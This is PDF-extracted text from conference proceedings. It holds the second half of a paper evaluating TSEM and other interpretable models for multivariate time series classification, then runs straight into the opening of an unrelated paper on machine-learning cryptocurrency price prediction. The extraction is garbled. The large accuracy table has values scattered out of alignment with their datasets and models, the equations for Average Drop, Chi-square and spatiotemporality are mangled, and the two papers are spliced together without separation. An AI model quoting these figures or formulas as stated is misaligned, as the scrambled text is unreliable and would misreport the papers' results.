where TP, FP, TN and FN are abbreviations for True Positive, False Positive, True Negative, and False Negative, respectively. The nominator (TP + TN) denotes the number of predictions that are equal to the actual class, while FP and FN indicate the number of predictions that are not equal to the true class. Following that, the average score is utilized to generate a Critical Difference Diagram that depicts any statistically significant difference between the architectures. It is created using the Dunn’s Test, a nonparametric technique for determining which means are more significant than the others. The Dunn’s test establishes a null hypothesis, in which no difference exists between groups, and an alternative hypothesis, in which a difference exists between groups. 4.3
Interpretability
Despite developing the interpretable CNN-based architecture and using GradCAM for interpretation, MTEX-CNN and XCM evaluate their explainability only using a percentage Average Drop metric and a human comprehensibility test on trivial simulation data. The majority of significant testing of CAM-based explanations are undertaken inside the CAM-based technique. Score-CAM [24] assesses their approach on the most comprehensive collection of trials merged from the other method, which is appropriate given the method’s recent publication. The assessments include metrics for evaluating faithfulness, such as Increase of Confidence, percent Average Drop, percent Average Increase, and Insertion/Deletion curves; metrics for evaluating localization, such as the energybased pointing game; and finally, a sanity check by examining the change in the visualization map when a random set of feature maps is used. By contrast, attention-based RNN techniques are primarily concerned with studying the attention’s spatiotemporal properties. As with the percent Average Drop, multiple approaches (DA-RNN, DSTP, and STAM) perform the ablation experiment by viewing the difference between the unattended and original multivariate time series data. Thus, a single set of interpretability evaluation trials should collect all the dispersed testing across the methodologies in order to serve as a baseline for comparing the effectiveness of each interpretation produced by each
TSEM
191
approach in the area of MTS classification. This includes human visual inspection, fidelity of the explanations to the model parameters, spatiotemporality of the explanation, and causality of the explanation in relation to the model parameters. Because the assessment is based on the interpretation of a given model prediction, before extracting an explanation for the model of choice, the model must be trained with at least chance-like accuracy. Since the explanation for attentionbased models is fundamental to the model parameters, explanations can be retrieved exclusively for the output class, but this is not the case with CAMbased approaches. Additionally, to ensure that interpretations become clearer, the interpretation process should be conducted on a single dataset with a maximum of three component time series. Thus, UWaveGestureLibrary is chosen for interpretability evaluation. Faithfulness. The evaluations that belong to this class attempt to justify whether the features that one explaining mechanism figures out are consistent with the outcomes of the model or not. These consist of two sub-classes, namely Average Drop/Average Increase and Deletion/Insertion AUC score. Average Drop and Average Increase are included together as a measure because they both test the same feature of an explanation’s faithfulness to the model parameters, but the Deletion/Insertion AUC score analyzes a different aspect. According to [4], given Yic as the prediction of class c on image i and Oic as the prediction of class c on image i but masked by the interpretation map, the Average Drop is defined as in Eq. 2 [24], whereas the Average Increase, also called the Increase of Confidence, is computed using Eq. 3. AverageDrop(%) =
N 1 max(0, Yic − Oic ) ∗ 100 N i=1 Yic
(2)
N Sign(Yic < Oic ) ∗ 100 N i=1
(3)
AverageIncrease(%) =
where Sign is the function that converts boolean values to their binary counterparts of 0 and 1. As the names of these approaches imply, an interpretability method performs well when the Average Drop percentage lowers and the Average Increase percentage grows. The Deletion and Insertion AUC score measures are intended to be used in conjunction with the Average Drop and Average Increase measurements. The deletion metric reflects a decrease in the predicted class’s probability when more and more crucial pixels are removed from the generated saliency map. A steep decline in the graph between the deletion percentage and the prediction score, equivalent to a low-lying area under the curve (AUC), indicates a plausible explanation. On the other hand, the insertion measure captures the increase in likelihood associated with the addition of additional relevant pixels, with a larger AUC implying a more complete explanation [24].
192
A.-D. Pham et al.
Causality. When doing a causality test, it is common practice to assign random numbers to the causes and see how they behave in response to those numbers. Using randomization, we may display different pieces of evidence that point to a causal link. This is accomplished by randomly assigning each feature vector one by one in a cascade method until all of the feature vectors of the input data are completely randomized. It is also necessary to randomize the time dimension up to the final time point, as previously stated. Each piece of randomized data is then put into the interpretable models in order to extract its interpretation matrix, which is then connected with the original explanations to see how far it is deviating from them. If the interpretation does not alter from the original one, it is possible that causal ties will be severed since the interpretation will be invariant with respect to the data input. The correlation values between the randomized input explanations and their root explanation without randomization serve as a quantitative evaluation of the tests. It is possible that the correlations produced using the same interpretable technique diverged, as shown by a drop in correlation factors, during the course of all cascading stages, and that this may be used as a shred of evidence for the existence of causal relationships. The Chi-square Goodness-of-fit hypothesis testing procedure is used to determine whether the divergence is significant enough to cause a difference between the yielded interpretations from the randomization and the initial interpretation map, with the null hypothesis being that there is no difference between the two interpretations yielded by the randomization. In other words, the null hypothesis is that the correlation between the original explanation and the observed data is 1, while the alternative hypothesis is that the correlation is the opposite. According to the following definition, the Chi-square is χ2 =
(Oi − Ei )2 Ei
,
(4)
where Oi denotes the observed value, which in this case is the correlation of interpretations obtained by input randomization, and Ei is the predicted value, which is 1, indicating a perfect match to the original interpretation map. All of the data in the UWaveGestureLibrary’s test set is evaluated in this manner, where the quantity of data minus one is the degree of freedom for the Chi-square test. Spatiotemporality. The spatiotemporality of a multivariate time series specifies and distributes the relevance weights for each time step of each feature vector. The metric for determining the explanation map’s spatiotemporality is as straightforward as ensuring both temporality and spatiality. In other words, the interpretation map must be adaptable in both time and space. For example, when N feature vectors and m time steps are used in a multivariate time series, it ensures spatiality when the summation of interpretation map values along the time axis for each feature does not equal N1 . Similarly, it would fulfill temporality if the total of the map along the feature axis for each time step t did not equal T1 . If one of these properties fails, the related property fails as well, which
TSEM
193
results in the spatiotemporality as a whole failing. These criteria are expressed mathematically in Eqs. 5 and 6.
Xnj =
j
Xit =
i
4.4
1 N
∀n ∈ {0, ..., N − 1}
(5)
1 t
∀t ∈ {0, ..., T − 1}
(6)
Experiment Settings
Due to the fact that XCM and TSEM allow for parameter adjustment to a fraction of the data length via time windows calculated in multiple layers of the architecture, it is either unfair to other architectures with a fixed-parameter setting or it makes the models themselves so large that the computational capabilities cannot handle the training and may result in overfitting to the training data. As a consequence, the number of their architectural parameters varies between datasets, and the time frame is set to the proportion that results in absolute values no more than 500. This is not the case with MTEX-CNN, since the number of parameters is fixed. The other attention-based RNN architectures employ an encoder-decoder structure, which will be set to 512 units for both the encoder and decoder modules. This assessment portion was entirely implemented using Google Colab Pro and the Paperspace Gradient platform. Google Colab Pro Platform includes a version of Jupyter Lab with 24 GB of RAM and a P100 graphics processing unit (GPU) card with 16 GB of VRAM for inference machine learning models that need a CUDA environment. Similarly, Paperspace’s Gradient platform enables users to connect with the Jupyter Notebook environment through a 30 GB RAM configuration with additional GPU possibilities up to V100, and evaluations are conducted using a P6000 card with 24 GB VRAM. 4.5
Experiment Results
The experiment results are presented by two folds: accuracy and interpretability, which has been further broken down into four sections, namely human visual evaluation, faithfulness, causality and spatiotemporality. Accuracy. As indicated before, this part evaluates 10 interpretable models on 30 datasets. Table 1 summarizes the findings. According to the table, TSEM, XCM and STAM models have significantly different average rankings and win/tie times when compared to the others. In which, TSEM has significantly higher accuracy towards datasets having long sequences such as Cricket and SelfRegulationSCP2 which have a length of 1197 and 1152 time steps, respectively [2]. RETAIN also performs well in comparison to the other approaches in terms of the average rank. While MTEX-CNN has the lowest average rank, it
194
A.-D. Pham et al.
Table 1. Accuracy evaluation of the interpretable models for each dataset with TSEM (DSTP is shorthand for DSTP-RNN, DSTP-p is shorthand for DSTP-RNN-Parallel, GeoMAN-l and GeoMAN-g are shorthands for GeoMAN-Local and GeoMAN-Global respectively) Datasets
MTEX-CNN XCM
TSEM DA-RNN RETAIN DSTP-p DSTP GeoMAN GeoMAN-g GeoMAN-l STAM
ArticularyWordRecognition 0.837
0.6
0.903
0.846
0.85
0.92
0.906
0.923
0.97
AtrialFibrillation
0.333
0.4667 0.4667 0.4
0.557
0.893
0.4
0.4
0.6
0.4
0.4667
0.333
0.533
BasicMotions
0.9
0.75
0.925
0.9
0.85
0.8
0.875
0.95
0.95
0.925
0.675
CharacterTrajectories
0.065
0.06
0.06
0.06
0.06
0.06
0.06
0.06
0.06
0.06
0.06
Cricket
0.083
0.583
0.722
0.208
0.208
0.153
0.194
0.194
0.208
0.194
0.75
0.4
0.42
0.32
0.28
0.26
0.36
0.4
0.38
0.42
0.42
0.42
0.42
0.42
0.42
0.42
0.42
0.412 0.565
DuckDuckGeese
0.2
0.54
EigenWorms
0.42
0.428 0.42
Epilepsy
0.601
0.804
0.891 0.348
0.312
0.384
0.384
0.333
0.341
0.326
EthanolConcentration
0.251
0.32
0.395 0.32
0.346
0.297
0.357
0.327
0.312
0.323
0.308
ERing
0.619
0.696
0.844 0.47
0.756
0.478
0.441
0.426
0.463
0.459
0.692
FaceDetection
0.5
0.5
0.513
0.5
0.545
0.518
0.515
0.517
0.517
0.63
0.65
FingerMovements
0.51
0.54
0.53
0.6
0.6
0.53
0.62
0.61
0.53
0.52
0.56
0.446
HandMovementDirection
0.405
0.54
0.514
0.46
0.487
0.378
0.527
0.473
0.392
0.527
Handwriting
0.051
0.095
0.117 0.051
0.061
0.055
0.051
0.051
0.037
0.051
0.099
Heartbeat
0.8727
0.771
0.746
0.722
0.756
0.722
0.722
0.722
0.722
0.727
0.756
JapaneseVowels
0.238
0.238 0.084
0.084
0.084
0.084
0.084
0.084
0.084
0.084
0.084
Libras
0.067
0.411
0.372
0.206
0.372
0.201
0.228
0.233
0.272
0.172
0.589
LSST
0.315
0.155
0.315
0.315
0.315
0.315
0.315
0.315
0.315
0.315
0.316
InsectWingbeat
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
MotorImagery
0.5
0.5
0.5
0.54
0.51
0.56
0.52
0.63
0.59
0.56
0.56
NATOPS
0.8
0.844 0.833
0.344
0.661
0.233
0.228
0.25
0.333
0.522
0.767
PEMS-SF
0.67
0.549
0.544
0.636
0.775
0.168
0.145
0.162
0.671
0.688
0.746
PenDigits
-
0.721
0.686
0.323
0.746
0.112
0.11
0.331
0.35
0.384
0.888
Phoneme
0.026
0.07
0.058
0.066
0.049
0.037
0.059
0.05
0.068
0.042
0.06
RacketSports
0.533
0.75
0.77
0.283
0.447
0.283
0.283
0.29
0.29
0.336
0.441
SelfRegulationSCP1
0.502
0.747
0.836
0.604
0.898
0.58
0.604
0.58
0.563
0.87
0.877
SelfRegulationSCP2
0.502
0.517
0.756 0.583
0.533
0.561
0.539
0.567
0.544
0.561
0.556
SpokenArabicDigits
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
0.01
StandWalkJump
0.333
0.467
0.467
0.4
0.333
0.467
0.333
0.467
0.467
0.533
0.533
UWaveGestureLibrary
0.725
0.813
0.831 0.497
0.781
0.406
0.497
0.466
0.375
0.444
0.813
Average Rank
6.5
3.7
3.5
5.1
4.3
6.1
6.1
5.0
5.1
5.2
3.2
Wins/Ties
5
8
9
2
4
2
4
4
3
3
9
has the highest number of wins/ties among the methods except from TSEM, XCM and STAM, indicating that this approach is unstable and not ideal for all types of datasets. In comparison, despite the fact that DA-RNN, GeoMANlocal, and GeoMAN-global acquire techniques with the fewest wins/ties, they have a solid average rank. Both DSTP-RNN and DSTP-RNN-parallel produce the same average rank; however, DSTP-wins/ties RNN’s times outnumber those of DSTP-RNN-parallel and this indicates that its behavior is consistent with the corresponding research on DSTP-RNN, which indicates that DSTP-RNN can remember a longer sequence than DSTP-RNN-parallel. Otherwise, the performance of DSTP-RNN and DSTP-RNN-parallel is not superior to the others, as their report shown in the regression issue, but it is the poorest of all the approaches.
TSEM
195
Fig. 4. The critical difference plot of the MTS classifiers on the UEA datasets with alpha equals to 0.05.
While comparing average rankings and wins/ties score might help determine a model’s quality, there may be discrepancies between these two measurements. Average rank is included in the Critical Difference Diagram to provide further insight. The statistical test shown in Fig. 4 was developed by Bonferroni-Dunn with an alpha of 0.05 and 30 datasets examined, which corresponds to the total number of datasets in the UEA collection. Figure 4 suggests that STAM, TSEM and XCM are the top-3 methods in terms of accuracy performance, and they are in the same group with RETAIN, DA-RNN and all the variants of GeoMAN posing a significant difference to the remaining three methods. Qualitative Evaluation. Regarding CNN-based architectures that are analyzed in this research, ten different CAM-based methods are evaluated for the explainability of the models. They are CAM [25], Grad-CAM [22], GradCAM++ [4], Smooth Grad-CAM++ [18], XGrad-CAM [8], Ablation-CAM [21], Score-CAM [24], Integrated Score-CAM [16], Activation-Smoothed Score-CAM [23] and Input-Smoothed Score-CAM [23]. However, only CAM, Grad-CAM++, and XGrad-CAM are examined in this part due to the supremacy of these three methods. Then, they are visually compared with the attention representation vectors of the attention-based RNN architectures with in a given context. Here, an example from the UWaveGestureLibrary dataset (shown in Fig. 5) illustrates a right turn downhill after a straight walk onwards. As previously mentioned, if there is no sanity check provided by human understanding, the explanations for a multivariate time series would be subtle. In other words, every element in the multivariate time series must be unambiguous about what it is supposed to be doing. To provide an example, the input data in Fig. 5 depicts a multivariate time series from the UWaveGestureLibrary dataset that corresponds to the three axes of an accelerometer that measure a staged action, which is designated by the label 1 in the category list. Knowing what each time series component represents, for example, knowing that the blue line represents the x-axis values of the acceleration sensor, it becomes clearer why they oscillate in certain patterns, as shown here by the blue line’s oscillation following the xaxis variation of the steep right turn as labeled. In particular, the action intervals for class number 1 are denoted with great precision. Indeed, the action would differ from person to person and from time to time, but in general, it can be
196
A.-D. Pham et al.
Fig. 5. A UWaveGestureLibrary class 1 instance with semantic segmentation
divided into five states and four stages based on the change in acceleration in the x-axis values of the sensor as reported by the uphill and downhill patterns of the blue line and the uphill and downhill patterns of the green line. As a result, the five states are denoted by the letters O, A, B, C and D, which correspond to the resting state, the beginning state, the switching state, the halting state, and the terminating state, in that order. The four phases are represented by the letters OA, AB, BC and CD, which represent the temporary stage, the first direction running stage, the second direction running stage, and the concluding stage, respectively, in the graphical representation. It is necessary to distinguish between transitory and concluding phases since an action is neither initiated or terminated immediately after a signal has been initiated or terminated by a device. All of the phases and stages are highlighted in both the multivariate time series and its label in order to demonstrate the sensible interconnections between them. So an interpretation map is more interesting if it highlights the critical points that are located between stages A and B; otherwise, it would be meaningless if it stressed the transient stage OA or the ending stage CD because, logically, one model should not choose class 1 over other classes simply because of its longer transient stage, for example. In general, according to Fig. 6, post-hoc explainability approaches based on CAM have yielded more continuous interpretation maps for XCM than explainability methods based on attention-based RNN models. It appears that the difference is due to the different nature of using CNN and RNN for extracting the learned features, with CNN being able to provide a local explanation specific to the input instance, whereas RNN is believed to yield a global explanation independent of the specific input instance in question. For the sake of this discussion, the explanation map produced by the attention in recurrent networks is designated for the category to which the input instance is categorized as a whole, and this category is represented by a node in the instance. Unlike RNN,
TSEM
197
Fig. 6. Explanation of some explainable models for a UWaveGestureLibrary class 1 instance. MTEX-CNN, XCM and TSEM are post-hoc explained by CAM, XGradCAM and Grad-CAM++. Explanations for attention-based RNN methods are their spatiotemporal attention vectors. The red lines show the highest activated regions of the input for class 1 as their predictions.
CNN does not have the capacity to memorize; the highlighted areas are simply those parts of the input instance that are aroused when the CNN encounters a label. As a result, the interpretation based on CAM is strongly reliant on the input signal. Faithfulness. As a contrastive pair, the two assessment metrics in each test are shown on a two-dimensional diagram, together with the correctness of each model, which is represented by the size of the circle representing the coordinates. When high-accuracy interpretable models are compared against lowaccuracy interpretable models, the accuracy might reveal how the explanations are impacted. The Average Drop and Average Increase metrics are displayed as percentages ranging from 0 to 100, and each point is represented by two coordinates that correspond to the average drop and average increase metrics. Because the Average Drop and Average Increase are inversely proportional, it is predicted that all of the points would follow a trend parallel to the line y = x. Considering that x represents the Average Drop value and y represents the Average Increase
198
A.-D. Pham et al.
Fig. 7. The average drop - average increase diagram for the UWaveGestureLibrary dataset. Accuracy is illustrated as proportional to the size of the circles. (The lower the average drop is, the more faithful the method get, as contrary to the average increase).
value, the right bottom is the lowest performance zone, while the left top is the highest performance sector in this equation. Taking into account the wide range of accuracy at each stage, it is rather simple to determine which technique provides the most accurate explanation for the model’s conclusion. Figure 7 depicts the distributions of interpretation techniques in terms of their association with the Average Drop and the Average Increase in percentages. All of the points are color-coded, with the red and yellow colors denoting the spectrum of CAM-based interpretations for the two different XCMs (XCM and TSEM), respectively. The blue hue represents MTEX-CNN, while the remaining colored spots represent the visualization for the attention-based approaches (which are not shown here). In general, the farther to the right the figure is moved, the poorer the implied performance becomes. As previously mentioned, all of the worst approaches are clustered together at the bottom right, where the Average Increase is at its lowest value and the Average Drop is at its greatest value, which is a significant difference. While both MTEX-CNN and STAM have great accuracy (as shown by the size of the circles), the collection of interpretations for MTEX-CNN and the attention vector for STAM have the lowest fidelity to their judgments.
TSEM
199
Fig. 8. The deletion/insertion AUC diagram for the UWaveGestureLibrary dataset. Accuracy is illustrated as proportional to the size of the circles. The diagram is shown in log-scale to magnify the distance between circles for a clearer demonstrative purpose. (The lower the deletion AUC score is, the more faithful the method get, as contrary to the insertion AUC score).
When only essential data points are considered in the input, the change in the models’ prediction score is gradually introduced to an empty sequence or is gradually removed from the original input data, and this is reflected through the Insertion and Deletion curves, respectively. The area under each curve serves as a measure, providing information about how quickly the curve is moving. It is anticipated that the area under the curve (AUC) of a Deletion Curve be as minimal as feasible, showing the rapid suppression of the model accuracy when the most relevant data points are beginning to be eliminated. Contrary to this, the AUC of an Insertion curve should be as substantial as feasible, which suggests that accuracy increases as soon as the initial most essential data points are added. Figure 8 depicts the relationship between Deletion AUC values and Insertion AUC values for a given sample size. Overall, there are no evident patterns in the AUC values or the accuracy of any approach when seen as a whole. When compared to their Insertion AUC values, the majority of the techniques are grouped in accordance with nearly equal Deletion AUC around 0.125, however the Grad-CAM collective approaches for MTEX-CNN stand out due to their remarkable Deletion AUC scores varied about 0.07. Furthermore, not only
200
A.-D. Pham et al.
do they have low Deletion AUC scores, but they also have a high Insertion AUC score, which is around 0.3. This is where STAM and the remaining CAM-based methods for MTEX-CNN are located, with Deletion AUC scores that are almost doubled when compared to the Grad-CAM collective for MTEX-CNN. Similarly, the RETAIN interpretation has the highest Insertion AUC score, which is approximately 0.5, which is four times higher than the XCM interpretations and four times higher than the rest of the attention-based techniques’ interpretations, with the exception of STAM. While XCM CAM-based explanations have nearly the same Insertion AUC score as GeoMAN, GeoMAN-local, GeoMANglobal, DA-RNN, DSTPRNN, and DSTP-RNN-parallel, they have the lowest Deletion AUC scores among the attention maps of GeoMAN, GeoMAN-local, GeoMAN-global, DA-RNN, DSTPRNN, and DSTP-RNN-parallel. It is hoped that the fidelity of the CAM-based explanations for TSEM will be at least as good as that of the XCM architecture, having been modified and corrected from the XCM design. Indeed, as seen in Fig. 7 and 8, the cluster for TSEM interpretation in both diagrams is distributed in a manner that is virtually identical to that of XCM. The TSEM, on the other hand, performs somewhat better in terms of two metrics: average increase and Insertion AUC (area under the curve). This implies that TSEM interpretations pay more attention to data points that are more meaningful in the multivariate time sequence. Most notably, the original CAM approach extracts an explanation map for TSEM with the smallest Average Drop when compared to the other methods tested. Causality. When attempting to reason about an effect in relation to a cause, the significance of causality cannot be overstated. Specifically, the effect corresponds to the explanation map that corresponds to its cause, which is the input data, and is connected to the cause and effect by means of a model that acts as a proxy between the cause and effect. For example, in contrast to the regression connection between a model’s input and output, explanation maps are produced as a result of a mix of inputs, model parameters, and outputs. While the model parameters and the output are maintained constant in this assessment, randomization is applied to two axes of the multivariate time series input. According to Fig. 9, the CAM-based explanations for TSEM with 320 occurrences in the UWaveGestureLibrary test set exhibit similar patterns to the XCM explanations. Specifically, none of the Score-CAM variants nor the Ablation-CAM variants pass the causality test. The distinction between TSEM and MTEX-CNN and XCM is that it renders the original CAM approach causal, which does not happen with MTEX-CNN or XCM. Additionally, the XGradexplanations CAM’s for TSEM are non-causal. Although the Ablation-CAM explanation technique fails in both XCM and TSEM, the failure is more pronounced in TSEM when the proportion of temporal non-causal data points surpasses the 10% threshold. In general, only three approaches satisfy the causality criteria for TSEM: Grad-CAM++, Smooth Grad-CAM++, and the original CAM. This is considered a good performance, because according to Fig. 9, almost 70% the number of models do not retain causality.
TSEM
201
Fig. 9. The bar chart of non-causal proportion of UWaveGestureLibrary test set inferred by TSEM CAM-based explanations vs the other interpretable methods. The lower proportion is, the better causation level a method gets and it must be below 10% to be considered (illustrated by the red line) pass the causality test.
Spatiotemporality. This assertion is made clearly in Eqs. 5 and 6, which relate to the spatiality and temporality tests, respectively. If both of these equations apply to an interpretation map, it is deemed to possess the spatiotemporal quality. Because the numbers in an explanation map do not add up to 1, they must be normalized before applying the criterion equations. This is done by dividing each value by the total of the whole map. All CAM-based method interpretations in XCM, TSEM and MTEX-CNN, as well as the attention-based interpretation, pass this set of tests. Because no negative instances are provided, the findings for each approach are omitted.
202
5
A.-D. Pham et al.
Conclusion and Outlook
After a thorough analysis of the currently available interpretable methods for MTS classification, the Temporally weighted Spatiotemporal Explainable network for Multivariate Time Series Classification, or TSEM for short, is developed on the basis of the successful XCM in order to address some of the XCM’s shortcomings. Specifically, XCM does not permit concurrent extraction of spatial and temporal explanations due to their separation into two parallel branches. Simultaneously, TSEM reweights the spatial data obtained in the first branch using the temporal information learnt from the recurrent layer in the second parallel branch. This is regarded to be a more productive method than XCM in terms of extracting real temporality from data rather than pseudo-temporality from the correlation of time-varying values in location. This also lends credence to an explanation including maps of the relative significance of temporal and spatial features. As a result, it is expected to provide a more compact and exact map of interpretation. Indeed, TSEM outperforms XCM in terms of accuracy across over 30 datasets in the UEA archive and in terms of explainability in the UWaveGestureLibrary. This study focuses only on model-specific interpretable approaches and makes no comparisons to model-independent methods. Thus, it would be interesting if TSEM could be analyzed with these methods using the same evaluation set of interpretability metrics. In any other case, TSEM would use concept embedding in its future work to encode tangible aspects into knowledge about a concept. After that, it would incorporate neuro-symbolic technique in order to provide a more solid explanation towards its prediction. In addition to this, causal inference has to be considered in order to get rid of any false connection in the logits and the feature maps. This would help strengthen the actual explanation and get rid of any confounding variables that may be present.
References 1. Assaf, R., Giurgiu, I., Bagehorn, F., Schumann, A.: MTEX-CNN: multivariate time series explanations for predictions with convolutional neural networks. In: 2019 IEEE International Conference on Data Mining (ICDM), pp. 952–957. IEEE (2019) 2. Bagnall, A., et al.: The UEA multivariate time series classification archive (2018). arXiv preprint arXiv:1811.00075 (2018) 3. Brendel, W., Bethge, M.: Approximating CNNs with bag-of-local-features models works surprisingly well on imagenet. arXiv preprint arXiv:1904.00760 (2019) 4. Chattopadhay, A., Sarkar, A., Howlader, P., Balasubramanian, V.N.: GradCAM++: generalized gradient-based visual explanations for deep convolutional networks. In: 2018 IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 839–847. IEEE (2018) 5. Chen, C., Li, O., Tao, D., Barnett, A., Rudin, C., Su, J.K.: This looks like that: deep learning for interpretable image recognition. In: Advances in Neural Information Processing Systems 32 (2019)
TSEM
203
6. Choi, E., Bahadori, M.T., Sun, J., Kulas, J., Schuetz, A., Stewart, W.: Retain: an interpretable predictive model for healthcare using reverse time attention mechanism. In: Advances in Neural Information Processing Systems 29 (2016) ´ Termier, A.: XCM: an explainable 7. Fauvel, K., Lin, T., Masson, V., Fromont, E., convolutional neural network for multivariate time series classification. Mathematics 9(23), 3137 (2021) 8. Fu, R., Hu, Q., Dong, X., Guo, Y., Gao, Y., Li, B.: Axiom-based GradCAM: towards accurate visualization and explanation of CNNs. arXiv preprint arXiv:2008.02312 (2020) 9. Gangopadhyay, T., Tan, S.Y., Jiang, Z., Meng, R., Sarkar, S.: Spatiotemporal attention for multivariate time series prediction and interpretation. In: 2021 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), ICASSP 2021, pp. 3560–3564. IEEE (2021) 10. Holzinger, A., Goebel, R., Fong, R., Moon, T., M¨ uller, K.R., Samek, W.: xxAI beyond explainable artificial intelligence. In: Holzinger, A., Goebel, R., Fong, R., Moon, T., M¨ uller, K.R., Samek, W. (eds.) xxAI - Beyond Explainable AI. Lecture Notes in Computer Science, vol. 13200, pp. 3–10. Springer, Cham (2022). https:// doi.org/10.1007/978-3-031-04083-2 1 11. Hu, D.: An introductory survey on attention mechanisms in NLP problems. In: Bi, Y., Bhatia, R., Kapoor, S. (eds.) IntelliSys 2019. AISC, vol. 1038, pp. 432–448. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-29513-4 31 12. Jain, S., Wallace, B.C.: Attention is not explanation. arXiv preprint arXiv:1902.10186 (2019) 13. Koh, P.W., et al.: Concept bottleneck models. In: International Conference on Machine Learning, pp. 5338–5348. PMLR (2020) 14. Liang, Y., Ke, S., Zhang, J., Yi, X., Zheng, Y.: GeoMAN: multi-level attention networks for geo-sensory time series prediction. In: IJCAI 2018, pp. 3428–3434 (2018) 15. Liu, Y., Gong, C., Yang, L., Chen, Y.: DSTP-RNN: a dual-stage two-phase attention-based recurrent neural network for long-term and multivariate time series prediction. Expert Syst. Appl. 143, 113082 (2020) 16. Naidu, R., Ghosh, A., Maurya, Y., Kundu, S.S., et al.: IS-CAM: integrated scoreCAM for axiomatic-based explanations. arXiv preprint arXiv:2010.03023 (2020) 17. Nauta, M., van Bree, R., Seifert, C.: Neural prototype trees for interpretable finegrained image recognition. In: Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 14933–14943 (2021) 18. Omeiza, D., Speakman, S., Cintas, C., Weldermariam, K.: Smooth grad-CAM++: an enhanced inference level visualization technique for deep convolutional neural network models. arXiv preprint arXiv:1908.01224 (2019) 19. Pfeifer, B., Secic, A., Saranti, A., Holzinger, A.: GNN-subnet: disease subnetwork detection with explainable graph neural networks. bioRxiv (2022) 20. Qin, Y., Song, D., Chen, H., Cheng, W., Jiang, G., Cottrell, G.: A dual-stage attention-based recurrent neural network for time series prediction. arXiv preprint arXiv:1704.02971 (2017) 21. Ramaswamy, H.G., et al.: Ablation-CAM: visual explanations for deep convolutional network via gradient-free localization. In: Proceedings of the IEEE/CVF Winter Conference on Applications of Computer Vision, pp. 983–991 (2020) 22. Selvaraju, R.R., Cogswell, M., Das, A., Vedantam, R., Parikh, D., Batra, D.: GradCAM: visual explanations from deep networks via gradient-based localization. In: Proceedings of the IEEE International Conference on Computer Vision, pp. 618– 626 (2017)
204
A.-D. Pham et al.
23. Wang, H., Naidu, R., Michael, J., Kundu, S.S.: SS-CAM: smoothed score-CAM for sharper visual feature localization. arXiv preprint arXiv:2006.14255 (2020) 24. Wang, H., et al.: Score-CAM: score-weighted visual explanations for convolutional neural networks. In: Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops, pp. 24–25 (2020) 25. Zhou, B., Khosla, A., Lapedriza, A., Oliva, A., Torralba, A.: Learning deep features for discriminative localization. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2921–2929 (2016)
AI in Cryptocurrency Alexander I. Iliev1,2(B) and Malvika Panwar1 1 SRH University Berlin, Charlottenburg, Germany
[email protected], {3105481, malvika.panwar}@stud.srh-campus-berlin.de 2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, 8 Acad. Georgi Bonchev Street, 1113 Sofia, Bulgaria
Abstract. This study investigates the predictability of six significant cryptocurrencies for the upcoming two days using AI techniques i.e., machine learning algorithms like random forest and gradient for predicting the price of these six cryptocurrencies. The study presents to us that machine learning can be seen as a medium to predict the prices of cryptocurrencies. A machine learning system learns from past data, constructs prediction models, and predicts the output for new data whenever it gets it. Predicted output’s accuracy is influenced by the quantity of data since the more data there is, the better the model can predict the output. The results show that with the accuracy score performance metric, which we employed for this study, we were able to calculate the accuracy of the algorithms and find that both algorithms random forest and gradient boosting respectively performed well for the cryptocurrencies such as Solana (98.07%,98.14%), Binance (96.56%, 96.85%), and Ethereum (96.61%, 96.60%)), with the exception of Tether (0.38%, 12.35%) and USD coin (–0.59%, 1.48%), the results demonstrate that both algorithms work effectively with the majority of cryptocurrencies which can be further increased by using deep learning algorithms like ANN, RNN or LSTM. Keywords: Cryptocurrency · Artificial intelligence · Machine learning · Deep learning · ANN · RNN · LSTM
1 Introduction Most developed countries throughout the world adopt cryptocurrencies on a wide scale. Some significant businesses have begun to accept cryptocurrency as a form of payment on a worldwide scale. Microsoft, Starbucks, Tesla, Amazon, and many others are just a few of them. The world today uses cryptocurrency, a form of virtual currency that is protected by cryptography and hence impossible to reproduce, to power its economy. Network-based blockchain technology is used to distribute cryptocurrencies. In its most basic form, the term “crypto” refers to the encryption of different algorithms and cryptographic techniques that safeguard the entries, such as elliptical curve encryption, public-private key pairs, etc. Cryptocurrency exchanges are easy since they are not tied to any country. These allow users to buy and sell cryptocurrencies using a variety of currencies. Cryptocurrencies are stored in a sophisticated wallet, which is conceptually © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 205–217, 2023. https://doi.org/10.1007/978-3-031-28073-3_14
206
A. I. Iliev and M. Panwar
comparable to a virtual bank account. Block chain is a place where the timestamp information and record of many trades are stored. In a block chain, a square represents each record. Each square has a link to a previous informational square. On the blockchain, the information is encrypted. Only the wallet ID of the customer is made visible during exchanges; their name is not [14]. Crypto currencies can be obtained in a few ways, including as through mining, or buying them on exchanges. Retail transactions are not used by many cryptocurrencies. They serve as a means of exchange and are typically used as assets rather than for regular purchases like groceries and utilities. As intriguing as this new class of investments may sound, cryptocurrencies come with a significant amount of risk, therefore thorough study is required. This paper’s main goal is to inform readers about the benefits and drawbacks of investing in cryptocurrencies. New investments are always accompanied by a great deal of uncertainty, so it is important to analyse every aspect of cryptocurrencies to provide users and investors with better information and to provide information that will encourage ethical usage of cryptocurrencies without having to consider the risks and potential failure of the investment. Cryptocurrencies are one of the riskiest but most prominent investments available in the modern technological and economic environment. Therefore, prediction of cryptocurrencies will play a greater role for investors to decide if it is best to invest on cryptocurrency or not. In this study, we suggest the 6 cryptocurrencies, and we use two ensemble machine learning algorithms—random forest and gradient boosting—to predict these cryptocurrencies for the next two days.
